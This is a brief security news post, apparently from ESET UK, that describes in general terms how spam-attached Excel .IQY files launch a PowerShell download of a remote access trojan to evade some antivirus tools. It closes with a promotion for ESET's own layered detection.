Baddies bypass AV with Excel files

Next story

Excel Web Query (.IQY) files are being used to bypass some antivirus software and infect victims with a remote access trojan (RAT) malware.

Cyber criminals are always on the hunt for simple but effective ways of evading antivirus software and infecting as many victims as possible.

The latest method to make the news involves using an IQY file, which are used to download data from the internet directly into Excel, to launch a PowerShell script.

Mark James, ESET IT Security Specialist, explains why this method is so effective against certain types of antivirus software.

“Malware writers will look at lots of different techniques to deliver malware to the victim’s machine; some are successful, some are not.

“In this case the file is usually attached to spam messages trying to trick the user into opening the attached file.

“Usually something that will pull on the financial strings of the victim: an unpaid invoice or extremely large utility bill.

“The small file basically contains a URL that downloads a PowerShell script; this in turn once run will enable further downloading of malware onto your machine.

“The problem here is the means to do all this is also widely used on desktops and servers, making it harder to detect without causing false positives.

“The way around this is for your antivirus software to use multiple detection methods that may include but are not limited to memory scanners, behavioural detection and machine learning to detect and stop these threats. This just highlights the fact that not all antivirus software is equal.”

How do you spot emails with fake attachments? Let us know on Twitter @ESETUK.

ESET IT security software uses multiple forms of detection that are layered to ensure that virtually nothing, be it old malware or brand new, can slip through and make your life a misery. With ESET, you can leave the security to us, while you explore the internet in safety.